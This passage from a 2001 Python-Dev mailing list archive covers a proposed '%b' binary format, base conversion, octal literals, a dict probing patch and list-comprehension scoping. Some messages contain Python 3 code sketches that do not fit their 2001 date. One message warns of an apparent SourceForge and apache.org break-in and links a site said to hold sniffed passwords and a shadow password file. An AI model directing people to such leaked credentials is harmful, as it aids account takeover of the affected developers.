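    """Hypothetical helper: base-2 numeral for a non-negative int, MSB first."""
    if n < 0:
        raise ValueError("negative numbers are not handled in this sketch")
    if n == 0:
        return "0"
    digits = []
    while n:
        n, bit = divmod(n, 2)
        digits.append(str(bit))  # collected least significant bit first
    return "".join(reversed(digits))


if __name__ == "__main__":
    print(to_binary(0x2D))  # 101101
```

Modern Python's built-in format(n, "b") produces the same digits and can serve as a cross-check.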

Reactions?

Greg




From esr at thyrsus.com  Wed May 30 23:28:38 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:28:38 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>; from Greg.Wilson@baltimore.com on Wed, May 30, 2001 at 05:11:16PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <20010530172838.A778@thyrsus.com>

Greg Wilson <Greg.Wilson at baltimore.com>:
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).  I realize
> this isn't a C-ism, but it would be very useful for
> teaching purposes, as newcomers find 101101 a lot
> easier to understand than 0x2D.
> 
> Reactions?

+1.  Didactically pretty useful, and the additional code won't boost
global complexity much.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Where rights secured by the Constitution are involved, there can be no
rule making or legislation which would abrogate them.
        -- Miranda vs. Arizona, 384 US 436 p. 491


From tim.one at home.com  Wed May 30 23:30:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:30:49 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <20010530131424.Y690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>

[Thomas Wouters]
> This raises an interesting point. Do we want separate pieces of the
> Python distribution to have separate licences ?

This is a question for the PSF to resolve, since the PSF is intended to
become the sole legal owner of Python's IP rights.

My position will be that nothing ships in the distribution unless copyright
has been assigned to the PSF, or the contributor has agreed to give the PSF
a non-exclusive irrevocable etc license to release their work under the PSF
license du jour.  Fleshing out the second option so as to prevent abuse on
either side is going to require significant effort ("what if the PSF goes
away?", "what if the PSF changes its license to something I hate?", "what if
I change my mind?", etc).

Unfortunately, significant effort takes significant time too, and nobody has
started on this yet.


From mal at lemburg.com  Wed May 30 23:31:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 30 May 2001 23:31:06 +0200
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com>
Message-ID: <3B15669A.43B70A44@lemburg.com>

"Eric S. Raymond" wrote:
> 
> Greg Wilson <Greg.Wilson at baltimore.com>:
> > I would like to add a "%b" format for converting
> > numbers to binary format (1's and 0's).  I realize
> > this isn't a C-ism, but it would be very useful for
> > teaching purposes, as newcomers find 101101 a lot
> > easier to understand than 0x2D.
> >
> > Reactions?
> 
> +1.  Didactically pretty useful, and the additional code won't boost
> global complexity much.

Good idea. The only question I have is: in which order will
you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I am thinking of adding a bit field type to mxNumber and have
the same problem there...
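A minimal sketch of the two bit orders in question, in Python 3, assuming a non-negative int and a hypothetical fixed width parameter. Byte order only comes into play once a value is dumped as a sequence of bytes, which this sketch does not do.

```python
def bits_msb_first(n, width):
    """Most significant bit on the left, as numerals are normally written."""
    return "".join(str((n >> k) & 1) for k in reversed(range(width)))


def bits_lsb_first(n, width):
    """Least significant bit (bit 0) on the left, i.e. in bit-index order."""
    return "".join(str((n >> k) & 1) for k in range(width))


if __name__ == "__main__":
    print(bits_msb_first(0x2D, 8))  # 00101101
    print(bits_lsb_first(0x2D, 8))  # 10110100
```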

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Wed May 30 23:42:22 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:42:22 -0400
Subject: [Python-Dev] Re: [Patches] [ python-Patches-428326 ] Timer class for threading
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:30:49PM -0400
References: <20010530131424.Y690@xs4all.nl> <LNBBLJKPBEHFEDALKOLCGEHDKFAA.tim.one@home.com>
Message-ID: <20010530174222.A1019@thyrsus.com>

Tim Peters <tim.one at home.com>:
> My position will be that nothing ships in the distribution unless copyright
> has been assigned to the PSF, or the contributor has agreed to give the PSF
> a non-exclusive irrevocable etc license to release their work under the PSF
> license du jour.  Fleshing out the second option so as to prevent abuse on
> either side is going to require significant effort ("what if the PSF goes
> away?", "what if the PSF changes its license to something I hate?", "what if
> I change my mind?", etc).
> 
> Unfortunately, significant effort takes significant time too, and nobody has
> started on this yet.

I think a PSF pledge to use only an OSI-certified license would address
some of these issues.  Write it into the bylaws if necessary.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

He that would make his own liberty secure must guard even his enemy from
oppression: for if he violates this duty, he establishes a precedent that
will reach unto himself.
	-- Thomas Paine


From esr at thyrsus.com  Wed May 30 23:44:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 17:44:57 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>; from mal@lemburg.com on Wed, May 30, 2001 at 11:31:06PM +0200
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <20010530172838.A778@thyrsus.com> <3B15669A.43B70A44@lemburg.com>
Message-ID: <20010530174457.B1019@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > > I would like to add a "%b" format for converting
> > > numbers to binary format (1's and 0's).  I realize
> > > this isn't a C-ism, but it would be very useful for
> > > teaching purposes, as newcomers find 101101 a lot
> > > easier to understand than 0x2D.
> > 
> > +1.  Didactically pretty useful, and the additional code won't boost
> > global complexity much.
> 
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?
> 
> I am thinking of adding a bit field type to mxNumber and have
> the same problem there...

For *this* context, we clearly want mathematical notation; MSB to the left
and no byte-swapping.  After all we'd actually be printing numerals, not 
dumping a bitfield.
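
A minimal Python sketch of that numeral-style output, assuming a hypothetical helper named `to_binary` (nothing like it exists in Python 2.1). The bits come out least significant first from repeated division by 2 and are then reversed, so the most significant bit is printed leftmost, the same order `%x` and `%o` already use.

```python
def to_binary(n: int) -> str:
    """Return the binary numeral for n, most significant bit first."""
    if n < 0:
        return "-" + to_binary(-n)
    if n == 0:
        return "0"
    digits = []
    while n:
        n, bit = divmod(n, 2)
        digits.append("01"[bit])      # collected least significant bit first
    return "".join(reversed(digits))  # reverse so the MSB ends up leftmost


print(to_binary(0x2D))  # 101101
```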
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The people of the various provinces are strictly forbidden to have in their
possession any swords, short swords, bows, spears, firearms, or other types
of arms. The possession of unnecessary implements makes difficult the
collection of taxes and dues and tends to foment uprisings.
        -- Toyotomi Hideyoshi, dictator of Japan, August 1588


From barry at digicool.com  Wed May 30 23:49:22 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 17:49:22 -0400
Subject: [Python-Dev] %b format?
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com>
Message-ID: <15125.27362.431144.886216@anthem.wooz.org>

>>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:

    GW> I would like to add a "%b" format for converting numbers to
    GW> binary format (1's and 0's).

For completeness, wouldn't you also want a binary integer literal so
your students could write binary numbers in their code?  And what
about a binary() operator a la hex()?

-Barry


From tim.one at home.com  Wed May 30 23:50:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 17:50:31 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <3B15669A.43B70A44@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>

[Greg Wilson]
> I would like to add a "%b" format for converting
> numbers to binary format (1's and 0's).

-0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
%o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
unfortunate that Python has distinct nb_oct and nb_hex slots in the
PyNumberMethods struct (as opposed to a single parameterized "convert to
base N string" method).

[MAL]
> Good idea. The only question I have is: in which order will
> you print the 0s and 1s (MSB->LSB, LSB->MSB, little/big endian) ?

I'm sure Greg has in mind only integers, in which case %x and %o already
give the only useful <wink> answer.


From fdrake at cj42289-a.reston1.va.home.com  Wed May 30 23:51:22 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed, 30 May 2001 17:51:22 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010530215122.3738C28849@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

    http://python.sourceforge.net/devel-docs/

Update for development version of Python (2.2).

This update substantially re-works the prototype support for
productions of a formal grammar.  They look better, support forward
references to symbol definitions, and allow download of an all-text
version of the complete grammar (with productions ordered the same way
as they are in the documentation sources).

"Documenting Python" now includes documentation for the LaTeX markup
used to describe productions:

    http://python.sourceforge.net/devel-docs/doc/grammar-displays.html


From esr at thyrsus.com  Thu May 31 00:05:09 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:05:09 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 05:50:31PM -0400
References: <3B15669A.43B70A44@lemburg.com> <LNBBLJKPBEHFEDALKOLCGEHFKFAA.tim.one@home.com>
Message-ID: <20010530180509.B1305@thyrsus.com>

Tim Peters <tim.one at home.com>:
> -0, due to compound lumpiness:  hex() is to %x is to __hex__ as oct() is to
> %o is to __oct__ as nothing is to %b is to nothing.  In that respect it's
> unfortunate that Python has distinct nb_oct and nb_hex slots in the
> PyNumberMethods struct (as opposed to a single parameterized "convert to
> base N string" method).

Is the right answer to add the convert-to-base slot and deprecate the
other two?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

If gun laws in fact worked, the sponsors of this type of legislation
should have no difficulty drawing upon long lists of examples of
criminal acts reduced by such legislation. That they cannot do so
after a century and a half of trying -- that they must sweep under the
rug the southern attempts at gun control in the 1870-1910 period, the
northeastern attempts in the 1920-1939 period, the attempts at both
Federal and State levels in 1965-1976 -- establishes the repeated,
complete and inevitable failure of gun laws to control serious crime.
        -- Senator Orrin Hatch, in a 1982 Senate Report


From fdrake at acm.org  Thu May 31 00:00:15 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 30 May 2001 18:00:15 -0400 (EDT)
Subject: [Python-Dev] Most recent documentation update
Message-ID: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>

  One thing I forgot to mention in my announcement of the update to
the development documentation which I just posted is that I went ahead
and converted all but one of the productions in the Reference Manual
to the new markup.  The print_stmt production, unfortunately, is given
twice instead of using a single model for the statement.  The
formatting tools don't support that (yet), and it's not clear that
they should.
  (No, Barry, don't go changing it...!)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From esr at thyrsus.com  Thu May 31 00:03:41 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:03:41 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>; from barry@digicool.com on Wed, May 30, 2001 at 05:49:22PM -0400
References: <930BBCA4CEBBD411BE6500508BB3328F2E1D99@nsamcanms1.ca.baltimore.com> <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <20010530180341.A1305@thyrsus.com>

Barry A. Warsaw <barry at digicool.com>:
> 
> >>>>> "GW" == Greg Wilson <Greg.Wilson at baltimore.com> writes:
> 
>     GW> I would like to add a "%b" format for converting numbers to
>     GW> binary format (1's and 0's).
> 
> For completeness, wouldn't you also want a binary integer literal so
> your students could write binary numbers in their code?  And what
> about a binary() operator a la hex()?

Barry is correct.  If we're going to do this, we ought to do it right and
support binary on a par with decimal, hex, and octal.  I favor this.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations.
	-- David Friedman


From barry at digicool.com  Thu May 31 00:05:37 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 30 May 2001 18:05:37 -0400
Subject: [Python-Dev] Most recent documentation update
References: <15125.28015.611763.968854@cj42289-a.reston1.va.home.com>
Message-ID: <15125.28337.938136.505675@anthem.wooz.org>

>>>>> "Fred" == Fred L Drake, Jr <fdrake at acm.org> writes:

    Fred> (No, Barry, don't go changing it...!)

Oh darn, three whole days work wasted...

:)


From tim.one at home.com  Thu May 31 00:17:42 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:17:42 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <15125.27362.431144.886216@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>

Note that in Vyper (John Skaller's Python variant) these are legit integer
literals:

0b11111111 0B11111111
0o777      0O777
0d999      0D999
0xfFf      0XFFf
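
Because each prefix names its base explicitly, reading such literals takes only a table lookup. A sketch in Python; `PREFIX_BASES` and `parse_prefixed_literal` are illustrative names, not Vyper's actual implementation.

```python
# Hypothetical table: each Vyper-style prefix letter and the base it selects.
PREFIX_BASES = {"b": 2, "o": 8, "d": 10, "x": 16}


def parse_prefixed_literal(text: str) -> int:
    """Parse a literal such as '0b1010', '0O777' or '0XFFf'."""
    if len(text) < 3 or text[0] != "0" or text[1].lower() not in PREFIX_BASES:
        raise ValueError("not a prefixed literal: %r" % text)
    base = PREFIX_BASES[text[1].lower()]  # prefix letter is case-insensitive
    return int(text[2:], base)            # int() accepts mixed-case hex digits


print(parse_prefixed_literal("0xfFf"))  # 4095
```

Note that a bare "0777" is rejected rather than silently read as octal.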

Vyper's octal notation is still ugly, but whoever first thought

    0777 != 777

was a "good idea" was certifiably insane <0.25 wink>.


From tim.one at home.com  Thu May 31 00:29:33 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 18:29:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530180509.B1305@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>

[Eric S. Raymond]
> Is the right answer to add the convert-to-base slot and deprecate the
> other two?

That would fix "the other" lump here in Python, that e.g.

>>> int("111", 3)
13
>>>

has no inverse.  string->int is happy with any base in 2..36 inclusive, but
int->string is spelled via 3 different builtins covering only 3 of those
bases.
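
The missing inverse is short to write for any base in 2..36. A minimal sketch, where `int_to_base` is a hypothetical name, using the same digit alphabet (0-9, then a-z) that `int()` accepts:

```python
import string

# '0'-'9' followed by 'a'-'z': the 36 digit symbols int() understands
DIGITS = string.digits + string.ascii_lowercase


def int_to_base(n: int, base: int) -> str:
    """Hypothetical inverse of int(s, base) for 2 <= base <= 36."""
    if not 2 <= base <= 36:
        raise ValueError("base must be in 2..36")
    if n == 0:
        return "0"
    sign = "-" if n < 0 else ""
    n = abs(n)
    out = []
    while n:
        n, d = divmod(n, base)
        out.append(DIGITS[d])  # least significant digit first
    return sign + "".join(reversed(out))


print(int_to_base(13, 3))  # 111, undoing int("111", 3)
```

Round-tripping through `int(int_to_base(n, b), b)` gives back `n` for every base `int()` supports.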

It would be more *expedient* to add "just" a __bin__/nb_bin method + a way
to spell binary int literals + a %b format + a bin() builtin.

On the fifth hand, I doubt anyone would want to add new % format codes for
bases {2..36} - {2, 8, 10, 16}.

So it will remain lumpy no matter what.  I look forward to the PEP <wink>.


From esr at thyrsus.com  Thu May 31 00:38:33 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:38:33 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530183833.B1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

For anyone who doesn't know the history behind this...  

The 0xxx notation was copied from PDP-11 assembler literals -- the
instruction-set design of the PDP-11 was such that most of the
instruction subfields fit in octal digits, so this convention made it
somewhat easier to read machine-code dumps.
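
To see why octal suits the PDP-11, here is a sketch assuming the standard double-operand layout: a 4-bit opcode followed by 6-bit source and destination fields, each made of a 3-bit addressing mode plus a 3-bit register number. The function name is illustrative. Every 3-bit field lands on exactly one octal digit:

```python
def pdp11_double_operand_fields(word: int) -> dict:
    """Split a 16-bit PDP-11 double-operand instruction into its fields."""
    return {
        "opcode": (word >> 12) & 0o17,  # 4 bits (top bit is the byte flag)
        "src_mode": (word >> 9) & 0o7,  # 3 bits
        "src_reg": (word >> 6) & 0o7,   # 3 bits
        "dst_mode": (word >> 3) & 0o7,  # 3 bits
        "dst_reg": word & 0o7,          # 3 bits
    }


mov_r1_r2 = 0o010102  # MOV R1, R2 (register mode for both operands)
print(format(mov_r1_r2, "06o"))  # 010102
print(pdp11_double_operand_fields(mov_r1_r2))
```

`MOV R1, R2` is 010102 in octal and reads off field by field; the same word in hex is 0x1042, where the 3-bit fields straddle digit boundaries.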

While I'm at it, I should note that the design of the 11 was ancestral
to both the 8088 and 68000 microprocessors, and thus to essentially 
every new general-purpose computer designed in the last fifteen years.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"Are we to understand," asked the judge, "that you hold your own interests
above the interests of the public?"

"I hold that such a question can never arise except in a society of cannibals."
	-- Ayn Rand


From esr at thyrsus.com  Thu May 31 00:39:43 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 30 May 2001 18:39:43 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:29:33PM -0400
References: <20010530180509.B1305@thyrsus.com> <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <20010530183943.C1654@thyrsus.com>

Tim Peters <tim.one at home.com>:
> [Eric S. Raymond]
> > Is the right answer to add the convert-to-base slot and deprecate the
> > other two?
> 
> That would fix "the other" lump here in Python, that e.g.
> 
> >>> int("111", 3)
> 13
> >>>
> 
> has no inverse.  string->int is happy with any base in 2..36 inclusive, but
> int->string is spelled via 3 different builtins covering only 3 of those
> bases.

That sounds like a strong argument to me.  
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The world is filled with violence. Because criminals carry guns, we
decent law-abiding citizens should also have guns. Otherwise they will
win and the decent people will lose.
        -- James Earl Jones


From nas at python.ca  Thu May 31 00:38:58 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 30 May 2001 15:38:58 -0700
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>; from tim.one@home.com on Wed, May 30, 2001 at 06:17:42PM -0400
References: <15125.27362.431144.886216@anthem.wooz.org> <LNBBLJKPBEHFEDALKOLCKEHIKFAA.tim.one@home.com>
Message-ID: <20010530153858.A21901@glacier.fnational.com>

Tim Peters wrote:
> Vyper's octal notation is still ugly, but whoever first thought
> 
>     0777 != 777
> 
> was a "good idea" was certifiably insane <0.25 wink>.

Ever used MacLisp or ZetaLisp?  There:

    777 == 0d511

If only we had been born with 8 or 16 fingers, right?

  Neil


From thomas at xs4all.net  Thu May 31 03:52:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 03:52:48 +0200
Subject: [Python-Dev] SF hacked
Message-ID: <20010531035248.G690@xs4all.nl>

It *seems*, from this site:

http://66.92.75.28/~vladimir/themes-org.html

that SourceForge has been hacked, and more seriously than SF first admits
(if I'm to believe the arrogant spouting of some script-kiddie, anyway. :)
And the same goes for apache.org, it looks like. Anyway, if anyone connected
*from* any of sourceforge's machines to anywhere else, in the last couple of
months, they'll be well advised to change their passwords and check for
intruders. The same goes if you connect through ssh and (foolishly ;)
allowed ssh-agent-forwarding to the SF machines. In that case, better check
all the machines that ssh-agent would give you unpassworded access to for
logins you don't recognize. The site above lists a number of sniffed
passwords, in case you want to check, but there's no reason for the hacker
not to have even more sniffed passwords lying about :)

And if you have a login on apache.org, you probably want to change your
password in any case.... the above listed site has what seems to be a copy
of the shadow password file.

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Thu May 31 05:53:53 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 30 May 2001 23:53:53 -0400
Subject: [Python-Dev] One more dict trick
Message-ID: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>

If anyone has an app known or suspected to be sensitive to dict timing,
please try the patch here.  Best I've been able to tell, it's a win.  But
it's a radical change in approach, so I don't want to rush it.

This gets rid of the polynomial machinery entirely, along with the branches
associated with updating the things, and the dictobject struct member
holding the table's poly.  Instead it relies on that

    i = (5*i + 1) % n

is a full-period RNG whenever n is a power of 2 (that's what guarantees it
will visit every slot), but perturbs that by adding in a few bits from the
full hash code shifted right each time (that's what guarantees every bit of
the hash code eventually influences the probe sequence, avoiding simple
quadratic-time degenerate cases).
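
The description above translates almost directly into a few lines of Python. This is a sketch of the idea only, not the patch itself (which is in the scrubbed attachment): the shift amount `PERTURB_SHIFT = 5` and the treatment of the hash as an unsigned 64-bit value are assumptions, and `probe_sequence` and `full_period` are illustrative names.

```python
from itertools import islice

PERTURB_SHIFT = 5  # assumed shift amount, not taken from the patch


def probe_sequence(h: int, n: int):
    """Yield table slots to probe for hash h; n must be a power of 2."""
    mask = n - 1                       # i & mask == i % n for power-of-2 n
    perturb = h & 0xFFFFFFFFFFFFFFFF   # treat the hash as unsigned 64-bit
    i = perturb & mask
    while True:
        yield i
        perturb >>= PERTURB_SHIFT          # bring in higher hash bits...
        i = (5 * i + perturb + 1) & mask   # ...on top of i = 5*i + 1


def full_period(n: int) -> bool:
    """True if i -> (5*i + 1) % n visits all n slots starting from 0."""
    i, seen = 0, set()
    for _ in range(n):
        seen.add(i)
        i = (5 * i + 1) % n
    return len(seen) == n


print([full_period(2 ** k) for k in range(1, 6)])  # all True
print(full_period(6))                              # False: 6 is not a power of 2
print(list(islice(probe_sequence(12345, 8), 10)))
```

Once `perturb` has been shifted down to zero, the loop is exactly the `5*i + 1` recurrence, so every slot is eventually probed.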
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: dict.txt
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010530/11ef83d8/attachment.txt>

From tim.one at home.com  Thu May 31 06:46:56 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:46:56 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530183833.B1654@thyrsus.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIHKFAA.tim.one@home.com>

[ESR]
> The 0xxx notation was copied from PDP-11 assembler literals -- the
> instruction-set design of the PDP-11 was such that most of the
> instruction subfields fit in octal digits, so this convention made it
> somewhat easier to read machine-code dumps.

That doesn't mean they weren't certifiably insane.  At Cray, we had a much
more sensible convention:  *all* numbers were octal (yes, it was a 64-bit
box and octal didn't make any sense, but Seymour Cray got used to it from
the 60-bit CDC w/ 18-bit address registers and didn't feel like changing).
My first boss there loved telling the story about how he was out for a drive
with the family, and excitedly screamed "Hey, kids!  Look!  The odometer is
just about to change to 40,000!".  Of course it read 37,777.9 at the time,
and they thought he was nuts.  That's where this kind of thing always leads
in the end.

to-disgrace-despair-and-eventually-ruin-ly y'rs  - tim


From tim.one at home.com  Thu May 31 06:48:28 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 31 May 2001 00:48:28 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <20010530153858.A21901@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEIHKFAA.tim.one@home.com>

[Neil Schemenauer]
> Ever used MacLisp or ZetaLisp?  There:
>
>     777 == 0d511
>
> If only we had been born with 8 or 16 fingers, right?

Then guys would probably be attracted to base 9 or 17.

sorry-for-that-but-i-felt-it-was-expected-of-me-ly y'rs  - tim


From greg at cosc.canterbury.ac.nz  Thu May 31 07:15:24 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:15:24 +1200 (NZST)
Subject: [Python-Dev] scoping and list comprehensions
In-Reply-To: <15125.23727.168431.762320@beluga.mojam.com>
Message-ID: <200105310515.RAA01757@s454.cosc.canterbury.ac.nz>

Skip:

>    scope:
>        l = [i**2 for i in range(10)]

By analogy with C, the introducer of a new scope should
simply be an unadorned colon:

  :
    l = [i**2 for i in range(10)]

:-)

While this might be useful, it doesn't really address the issue
raised, because we really need a new scope per listcomp (or
maybe even each 'for' in the listcomp).

> There's also the problem of how to export results from the scope, though
> perhaps the new nested scope stuff provides a solution to that.

Nope -- there's still no way to assign to any name in
an intermediate scope. Something heretical, such as
declarations, would be needed.
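
For comparison, Python 3 later added a declaration of this kind, `nonlocal`. A minimal sketch (it will not run on the 2.x interpreters discussed here; `make_counter` is an illustrative name):

```python
def make_counter():
    count = 0            # bound in make_counter's scope
    def increment():
        nonlocal count   # assign to the enclosing binding, not a new local
        count += 1
        return count
    return increment


tick = make_counter()
tick()
print(tick())  # 2
```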

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:11 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz>

Tim:

> >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in
>              digits]

Yikes! That would be clearer as

  [[x,y,z] for x in digits for y in digits for z in digits]

I'll concede it's nowhere near as much fun, though...
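
Both spellings can be checked side by side in Python 3. A sketch assuming `digits = [0, 1, 2]` and a pre-allocated three-element list `x` for Tim's version, since the quoted fragment shows neither:

```python
digits = [0, 1, 2]  # assumed; the quoted fragment does not define it

# Greg's version: plain names as loop targets (local to the comprehension in Python 3)
gregs = [[x, y, z] for x in digits for y in digits for z in digits]

# Tim's version: list items as loop targets; x[:] snapshots the list each time
x = [None, None, None]
tims = [x[:] for x[0] in digits for x[1] in digits for x[2] in digits]

assert tims == gregs
print(len(gregs), gregs[:4])  # 27 [[0, 0, 0], [0, 0, 1], [0, 0, 2], [0, 1, 0]]
```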

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:41 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>

Tim:

> Needs a PEP, and possibly
> even an associated future-statement.  Overall, I'm more in favor of changing
> it than not.

If we do this, we also need to consider whether we want
to make the corresponding change to regular for-loops.
Seems to me that all the reasons it's a good idea for
listcomps apply to for-loops as well.

Another advantage of changing both together is that
we can continue to describe listcomp semantics in terms
of for-loops instead of lambdas. Then we won't have to go 
into hiding until Guido dies or lifts the fatwah against
us.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:17:16 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:17:16 +1200 (NZST)
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>

Tim:

> On the fifth hand, I doubt anyone would want to add new % format codes for
> bases {2..36} - {2, 8, 10, 16}.

So, just add one general one:

  %m.nb

with n being the base. If n defaults to 2, you can read the "b"
as either "base" or "binary".

Literals:

  0b(5)21403       general
  0b11001101       binary

Conversion functions:

  base(x, n)       general
  bin(x)           equivalent to base(x, 2) (for symmetry with
                                             existing hex, oct)

Type slots:

  __base__(x, n)

Backwards compatibility measures:

